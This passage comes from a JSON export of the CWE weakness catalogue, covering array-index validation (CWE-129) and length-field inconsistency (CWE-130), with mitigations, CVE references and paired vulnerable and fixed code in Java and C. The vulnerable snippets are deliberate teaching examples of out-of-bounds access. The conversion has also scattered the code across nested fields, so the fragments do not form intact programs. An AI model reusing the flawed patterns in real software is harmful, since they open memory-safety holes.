that using a framework does not automatically address all input validation problems; be mindful of weaknesses that could arise from misusing the framework itself (CWE-1173)."},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":{"xhtml:p":["For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.","Even though client-side checks provide minimal benefits with respect to server-side security, they are still useful. First, they can support intrusion detection. If the server receives input that should have been rejected by the client, then it may be an indication of an attack. Second, client-side error-checking can provide helpful feedback to the user about the expectations for valid input. Third, there may be a reduction in server-side processing time for accidental input errors, although this is typically a small savings."]}},{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, Ada allows the programmer to constrain the values of a variable and languages such as Java and Ruby will allow the programmer to handle exceptions when an out-of-bounds index is accessed."]}},{"attr":{"@_Mitigation_ID":"MIT-11"},"Phase":"Operation","Strategy":"Environment Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that randomly arrange the positions of a program\'s executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.","Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-12"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61].","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software\'s state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When accessing a user-controlled array index, use a stringent range of values that are within the target array. Make sure that you do not allow negative values to be used. That is, verify the minimum as well as the maximum of the range of acceptable values."]}},{"attr":{"@_Mitigation_ID":"MIT-35"},"Phase":"Implementation","Description":"Be especially careful to validate all input when invoking code that crosses language boundaries, such as from an interpreted language to native code. This could create an unexpected interaction between the language boundaries. Ensure that you are not violating any of the expectations of the language with which you are interfacing. For example, even though Java may not be susceptible to buffer overflows, providing a large argument in a call to native code might trigger an overflow."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the code snippet below, an untrusted integer value is used to reference an object in an array.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String getValue(int index) {}","xhtml:div":{"#text":"return array[index];","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"If index is outside of the range of the array, this may result in an ArrayIndexOutOfBounds Exception being raised."},{"attr":{"@_Demonstrative_Example_ID":"DX-34"},"Intro_Text":"The following example takes a user-supplied value to allocate an array of objects and then operates on the array.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private void buildList ( int untrustedListSize ){}","xhtml:div":{"#text":"if ( 0 > untrustedListSize ){}Widget[] list = new Widget [ untrustedListSize ];list[0] = new Widget();","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"die(\\"Negative value supplied for list size, die evil hacker!\\");","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""]}}},"Body_Text":"This example attempts to build a list from a user-specified value, and even checks to ensure a non-negative value is supplied. If, however, a 0 value is provided, the code will build an array of size 0 and then try to store a new Widget in the first location, causing an exception to be thrown."},{"attr":{"@_Demonstrative_Example_ID":"DX-100"},"Intro_Text":"In the following code, the method retrieves a value from an array at a specific array index location that is given as an input parameter to the method","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int getValueFromArray(int *array, int len, int index) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int value;if (index < len) {}else {}return value;","xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["// check that the array index is less than the maximum","// length of the array","// if array index is invalid then output error message","// and return value indicating error"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"value = array[index];","xhtml:br":["",""],"xhtml:i":"// get the value at the specified index of the array"}},{"#text":"printf(\\"Value is: %d\\\\n\\", array[index]);value = -1;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...if (index >= 0 && index < len) {...","xhtml:br":["","","","","","","",""],"xhtml:i":["// check that the array index is within the correct","// range of values for the array"]}}],"Body_Text":"However, this method only verifies that the given array index is less than the maximum length of the array but does not check for the minimum value (CWE-839). This will allow a negative value to be accepted as the input array index, which will result in a out of bounds read (CWE-125) and may allow access to sensitive memory. The input array index should be checked to verify that is within the maximum and minimum range required for the array (CWE-129). In this example the if statement should be modified to include a minimum range check, as shown below."},{"attr":{"@_Demonstrative_Example_ID":"DX-134"},"Intro_Text":"The following example retrieves the sizes of messages for a pop3 mail server. The message sizes are retrieved from a socket that returns in a buffer the message number and the message size, the message number (num) and size (size) are extracted from the buffer and the message size is placed into an array using the message number for the array index.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int getsizes(int sock, int count, int *sizes) {}","xhtml:br":["",""],"xhtml:i":"/* capture the sizes of all messages */","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...char buf[BUFFER_SIZE];int ok;int num, size;while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0){}","xhtml:br":["","","","","","",""],"xhtml:i":"// read values from socket and added to sizes array","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (DOTLINE(buf))else if (sscanf(buf, \\"%d %d\\", &num, &size) == 2)","xhtml:br":["","",""],"xhtml:i":"// continue read from socket until buf only contains \'.\'","xhtml:div":[{"#text":"break;","attr":{"@_style":"margin-left:10px;"}},{"#text":"sizes[num - 1] = size;","attr":{"@_style":"margin-left:10px;"}}]}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int getsizes(int sock, int count, int *sizes) {}","xhtml:br":["",""],"xhtml:i":"/* capture the sizes of all messages */","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...char buf[BUFFER_SIZE];int ok;int num, size;while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0){}","xhtml:br":["","","","","","",""],"xhtml:i":"// read values from socket and added to sizes array","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (DOTLINE(buf))else if (sscanf(buf, \\"%d %d\\", &num, &size) == 2) {}","xhtml:br":["","",""],"xhtml:i":"// continue read from socket until buf only contains \'.\'","xhtml:div":[{"#text":"break;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (num > 0 && num <= (unsigned)count)else","xhtml:div":[{"#text":"sizes[num - 1] = size;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"report(stderr, \\"Warning: ignoring bogus data for message sizes returned by server.\\\\n\\");","xhtml:br":["",""],"xhtml:i":"/* warn about possible attempt to induce buffer overflow */"}}],"xhtml:br":""}}]}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}}],"Body_Text":"In this example the message number retrieved from the buffer could be a value that is outside the allowable range of indices for the array and could possibly be a negative number. Without proper validation of the value to be used for the array index an array overflow could occur and could potentially lead to unauthorized access to memory addresses and system crashes. The value of the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code."},{"attr":{"@_Demonstrative_Example_ID":"DX-133"},"Intro_Text":"In the following example the method displayProductSummary is called from a Web service servlet to retrieve product summary information for display to the user. The servlet obtains the integer value of the product number from the user and passes it to the displayProductSummary method. The displayProductSummary method passes the integer value of the product number to the getProductSummary method which obtains the product summary from the array object containing the project summaries using the integer value of the product number as the array index.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String displayProductSummary(int index) {}public String getProductSummary(int index) {}","xhtml:br":["","","","",""],"xhtml:i":"// Method called from servlet to obtain product information","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String productSummary = new String(\\"\\");try {} catch (Exception ex) {...}return productSummary;","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"String productSummary = getProductSummary(index);","attr":{"@_style":"margin-left:10px;"}}}},{"#text":"return products[index];","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public String displayProductSummary(int index) {}public String getProductSummary(int index) {}","xhtml:br":["","","","",""],"xhtml:i":"// Method called from servlet to obtain product information","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String productSummary = new String(\\"\\");try {} catch (Exception ex) {...}return productSummary;","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"String productSummary = getProductSummary(index);","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String productSummary = \\"\\";if ((index >= 0) && (index < MAX_PRODUCTS)) {}else {}return productSummary;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"productSummary = products[index];","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.err.println(\\"index is out of bounds\\");throw new IndexOutOfBoundsException();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}]}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"ArrayList productArray = new ArrayList(MAX_PRODUCTS);...try {} catch (IndexOutOfBoundsException ex) {...}","xhtml:br":["",""],"xhtml:div":{"#text":"productSummary = (String) productArray.get(index);","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["In this example the integer value used as the array index that is provided by the user may be outside the allowable range of indices for the array which may provide unexpected results or cause the application to fail. The integer value used for the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code.","An alternative in Java would be to use one of the collection objects such as ArrayList that will automatically generate an exception if an attempt is made to access an array index that is out of bounds."]},{"attr":{"@_Demonstrative_Example_ID":"DX-90"},"Intro_Text":"The following example asks a user for an offset into an array to select an item.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main (int argc, char **argv) {}","xhtml:br":"","xhtml:div":{"#text":"char *items[] = {\\"boat\\", \\"car\\", \\"truck\\", \\"train\\"};int index = GetUntrustedOffset();printf(\\"You selected %s\\\\n\\", items[index-1]);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The programmer allows the user to specify which element in the list to select, however an attacker can provide an out-of-bounds offset, resulting in a buffer over-read (CWE-126)."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0369","Description":"large ID in packet used as array index","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0369"},{"Reference":"CVE-2001-1009","Description":"negative array index as argument to POP LIST command","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1009"},{"Reference":"CVE-2003-0721","Description":"Integer signedness error leads to negative array index","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0721"},{"Reference":"CVE-2004-1189","Description":"product does not properly track a count and a maximum number, which can lead to resultant array index overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1189"},{"Reference":"CVE-2007-5756","Description":"Chain: device driver for packet-capturing software allows access to an unintended IOCTL with resultant array index error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5756"},{"Reference":"CVE-2005-2456","Description":"Chain: array index error (CWE-129) leads to deadlock (CWE-833)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2456"}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Unchecked array indexing"},{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"INDEX - Array index overflow"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR00-C","Entry_Name":"Understand how arrays work"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR30-C","Entry_Name":"Do not form or use out-of-bounds pointers or array subscripts","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR38-C","Entry_Name":"Do not add or subtract an integer to a pointer if the resulting value does not refer to a valid array element"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT32-C","Entry_Name":"Ensure that operations on signed integers do not result in overflow"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"IDS32-PL","Entry_Name":"Validate any integer that is used as an array index","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-129"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"100"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, "Array Indexing Errors" Page 144"}},{"attr":{"@_External_Reference_ID":"REF-96"}},{"attr":{"@_External_Reference_ID":"REF-58"}},{"attr":{"@_External_Reference_ID":"REF-60"}},{"attr":{"@_External_Reference_ID":"REF-61"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 5: Buffer Overruns." Page 89"}},{"attr":{"@_External_Reference_ID":"REF-64"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-129"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":[{"#text":"This weakness can precede uncontrolled memory allocation (CWE-789) in languages that automatically expand an array when an index is used that is larger than the size of the array, such as JavaScript.","attr":{"@_Type":"Relationship"}},{"#text":"An improperly validated array index might lead directly to the always-incorrect behavior of \\"access of array using out-of-bounds index.\\"","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Observed_Examples, Other_Notes, Potential_Mitigations, Theoretical_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Potential_Mitigations, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Unchecked Array Indexing","attr":{"@_Date":"2009-10-29"}}}},"130":{"attr":{"@_ID":"130","@_Name":"Improper Handling of Length Parameter Inconsistency","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software parses a formatted message or structure, but it does not handle or incorrectly handles a length field that is inconsistent with the actual length of the associated data.","Extended_Description":"If an attacker can manipulate the length parameter associated with an input such that it is inconsistent with the actual length of the input, this can be leveraged to cause the target application to behave in unexpected, and possibly, malicious ways. One of the possible motives for doing so is to pass in arbitrarily large input to the application. Another possible motivation is the modification of application state by including invalid data for subsequent properties of the application. Such weaknesses commonly lead to attacks such as buffer overflows and execution of arbitrary code.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"240","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"805","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":[{"Term":"length manipulation"},{"Term":"length tampering"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Memory","Modify Memory","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"When processing structured incoming data containing a size field followed by raw data, ensure that you identify and resolve any inconsistencies between the size field and the actual size of the data."},{"Phase":"Implementation","Description":"Do not let the user control the size of the buffer."},{"Phase":"Implementation","Description":"Validate that the length of the user-supplied data is consistent with the buffer size."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-91"},"Intro_Text":"In the following C/C++ example the method processMessageFromSocket() will get a message from a socket, placed into a buffer, and will parse the contents of the buffer into a structure that contains the message length and the message body. A for loop is used to copy the message body into a local character string which will be passed to another method for processing.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int processMessageFromSocket(int socket) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int success;char buffer[BUFFER_SIZE];char message[MESSAGE_SIZE];if (getMessage(socket, buffer, BUFFER_SIZE) > 0) {}return success;","xhtml:br":["","","","","","","","",""],"xhtml:i":["// get message from socket and store into buffer","//Ignoring possibliity that buffer > BUFFER_SIZE"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ExMessage *msg = recastBuffer(buffer);int index;for (index = 0; index < msg->msgLength; index++) {}message[index] = \'\\\\0\';success = processMessage(message);","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// place contents of the buffer into message structure","// copy message body into string for processing","// process message"],"xhtml:div":{"#text":"message[index] = msg->msgBody[index];","attr":{"@_style":"margin-left:10px;"}}}}}}}},"Body_Text":"However, the message length variable from the structure is used as the condition for ending the for loop without validating that the message length variable accurately reflects the length of the message body (CWE-606). This can result in a buffer over-read (CWE-125) by reading from memory beyond the bounds of the buffer if the message length variable indicates a length that is longer than the size of a message body (CWE-130)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-0160","Description":"Chain: \\"Heartbleed\\" bug receives an inconsistent length parameter (CWE-130) enabling an out-of-bounds read (CWE-126), returning memory that could include private cryptographic keys and other sensitive data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160"},{"Reference":"CVE-2009-2299","Description":"Web application firewall consumes excessive memory when an HTTP request contains a large Content-Length value but no POST data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2299"},{"Reference":"CVE-2001-0825","Description":"Buffer overflow in internal string handling routine allows remote attackers to execute arbitrary commands via a length argument of zero or less, which disables the length check.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0825"},{"Reference":"CVE-2001-1186","Description":"Web server allows remote attackers to cause a denial of service via an HTTP request with a content-length value that is larger than the size of the request, which prevents server from timing out the connection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1186"},{"Reference":"CVE-2001-0191","Description":"Service does not properly check the specified length of a cookie, which allows remote attackers to execute arbitrary commands via a buffer overflow, or brute force authentication by using a short cookie length.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0191"},{"Reference":"CVE-2003-0429","Description":"Traffic analyzer allows remote attackers to cause a denial of service and possibly execute arbitrary code via invalid IPv4 or IPv6 prefix lengths, possibly triggering a buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0429"},{"Reference":"CVE-2000-0655","Description":"Chat client allows remote attackers to cause a denial of service or execute arbitrary commands via a JPEG image containing a comment with an illegal field length of 1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0655"},{"Reference":"CVE-2004-0492","Description":"Server allows remote attackers to cause a denial of service and possibly execute arbitrary code via a negative Content-Length HTTP header field causing a heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0492"},{"Reference":"CVE-2004-0201","Description":"Help program allows remote attackers to execute arbitrary commands via a heap-based buffer overflow caused by a .CHM file with a large length field","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0201"},{"Reference":"CVE-2003-0825","Description":"Name services does not properly validate the length of certain packets, which allows attackers to cause a denial of service and possibly execute arbitrary code. Can overlap zero-length issues","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0825"},{"Reference":"CVE-2004-0095","Description":"Policy manager allows remote attackers to cause a denial of service (memory consumption and crash) and possibly execute arbitrary code via an HTTP POST request with an invalid Content-Length value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0095"},{"Reference":"CVE-2004-0826","Description":"Heap-based buffer overflow in library allows remote attackers to execute arbitrary code via a modified record length field in an SSLv2 client hello message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0826"},{"Reference":"CVE-2004-0808","Description":"When domain logons are enabled, server allows remote attackers to cause a denial of service via a SAM_UAS_CHANGE request with a length value that is larger than the number of structures that are provided.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0808"},{"Reference":"CVE-2002-1357","Description":"Multiple SSH2 servers and clients do not properly handle packets or data elements with incorrect length specifiers, which may allow remote attackers to cause a denial of service or possibly execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1357"},{"Reference":"CVE-2004-0774","Description":"Server allows remote attackers to cause a denial of service (CPU and memory exhaustion) via a POST request with a Content-Length header set to -1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0774"},{"Reference":"CVE-2004-0989","Description":"Multiple buffer overflows in xml library that may allow remote attackers to execute arbitrary code via long URLs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0989"},{"Reference":"CVE-2004-0568","Description":"Application does not properly validate the length of a value that is saved in a session file, which allows remote attackers to execute arbitrary code via a malicious session file (.ht), web site, or Telnet URL contained in an e-mail message, triggering a buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0568"},{"Reference":"CVE-2003-0327","Description":"Server allows remote attackers to cause a denial of service via a remote password array with an invalid length, which triggers a heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0327"},{"Reference":"CVE-2003-0345","Description":"Product allows remote attackers to cause a denial of service and possibly execute arbitrary code via an SMB packet that specifies a smaller buffer length than is required.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0345"},{"Reference":"CVE-2004-0430","Description":"Server allows remote attackers to execute arbitrary code via a LoginExt packet for a Cleartext Password User Authentication Method (UAM) request with a PathName argument that includes an AFPName type string that is longer than the associated length 